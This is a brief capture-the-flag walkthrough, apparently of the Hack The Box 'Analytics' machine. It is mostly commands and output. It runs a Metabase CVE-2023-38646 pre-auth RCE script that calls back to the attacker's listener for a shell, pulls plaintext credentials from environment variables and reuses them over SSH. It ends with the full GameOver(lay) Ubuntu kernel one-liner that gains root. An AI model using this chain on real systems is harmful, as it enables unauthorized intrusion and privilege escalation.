


website, going to login shows us metabase

searchsploit shows one results


┌──(kali㉿kali)-[~]
└─$ python3 51797.py -l 10.10.14.10 -p 4444 -P 8000 -u http://data.analytical.htb
[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]
[*] Retriving setup token
[+] Setup token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f
[*] Tesing if metabase is vulnerable
[+] Starting http server on port 8000
[+] Metabase version seems exploitable
[+] Exploiting the server
metabase_shell > id

uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)

metabase_shell > ls -la

total 92
drwxr-xr-x    1 root     root          4096 Aug 14 16:17 .
drwxr-xr-x    1 root     root          4096 Aug 14 16:17 ..
-rwxr-xr-x    1 root     root             0 Aug 14 16:17 .dockerenv
drwxr-xr-x    1 root     root          4096 Jun 29  2023 app
drwxr-xr-x    1 root     root          4096 Jun 29  2023 bin
drwxr-xr-x    5 root     root           340 Aug 14 16:17 dev
drwxr-xr-x    1 root     root          4096 Aug 14 16:17 etc
drwxr-xr-x    1 root     root          4096 Aug  3  2023 home
drwxr-xr-x    1 root     root          4096 Jun 14  2023 lib
drwxr-xr-x    5 root     root          4096 Jun 14  2023 media
drwxr-xr-x    1 metabase metabase      4096 Aug  3  2023 metabase.db
drwxr-xr-x    2 root     root          4096 Jun 14  2023 mnt
drwxr-xr-x    1 root     root          4096 Jun 15  2023 opt
drwxrwxrwx    1 root     root          4096 Aug  7  2023 plugins
dr-xr-xr-x  208 root     root             0 Aug 14 16:17 proc
drwx------    1 root     root          4096 Aug  3  2023 root
drwxr-xr-x    2 root     root          4096 Jun 14  2023 run
drwxr-xr-x    2 root     root          4096 Jun 14  2023 sbin
drwxr-xr-x    2 root     root          4096 Jun 14  2023 srv
dr-xr-xr-x   13 root     root             0 Aug 14 16:17 sys
drwxrwxrwt    1 root     root          4096 Aug  3  2023 tmp
drwxr-xr-x    1 root     root          4096 Jun 29  2023 usr
drwxr-xr-x    1 root     root          4096 Jun 14  2023 var

metabase_shell > sudo -l


metabase_shell > 


metabase_shell > printenv

SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=4df09859ca19
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=metalytics
META_PASS=An4lytics_ds20223#
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
SHLVL=2
MB_DB_USER=
FC_LANG=en-US
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
LC_CTYPE=en_US.UTF-8
MB_LDAP_BIND_DN=
LC_ALL=en_US.UTF-8
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_CONNECTION_URI=
JAVA_VERSION=jdk-11.0.19+7
_=/bin/printenv

metabase_shell > 


ssh in using those creds

metalytics@analytics:~$ ls -la
total 36
drwxr-x--- 4 metalytics metalytics 4096 Aug  8  2023 .
drwxr-xr-x 3 root       root       4096 Aug  8  2023 ..
lrwxrwxrwx 1 root       root          9 Aug  3  2023 .bash_history -> /dev/null
-rw-r--r-- 1 metalytics metalytics  220 Aug  3  2023 .bash_logout
-rw-r--r-- 1 metalytics metalytics 3771 Aug  3  2023 .bashrc
drwx------ 2 metalytics metalytics 4096 Aug  8  2023 .cache
drwxrwxr-x 3 metalytics metalytics 4096 Aug  8  2023 .local
-rw-r--r-- 1 metalytics metalytics  807 Aug  3  2023 .profile
-rw-r----- 1 root       metalytics   33 Aug 14 16:15 user.txt
-rw-r--r-- 1 metalytics metalytics   39 Aug  8  2023 .vimrc

metalytics@analytics:~$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
metalytics@analytics:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 22.04.3 LTS
Release:        22.04
Codename:       jammy
metalytics@analytics:~$ 


Version 6.2.0 of
Ubuntu 22.04 LTS (Jammy Jellyfish)
Game Over(lay)

metalytics@analytics:~$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
mkdir: cannot create directory ‘l’: File exists
mkdir: cannot create directory ‘u’: File exists
mkdir: cannot create directory ‘w’: File exists
mkdir: cannot create directory ‘m’: File exists
root@analytics:~# id
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)
root@analytics:~# cat /root/root.txt
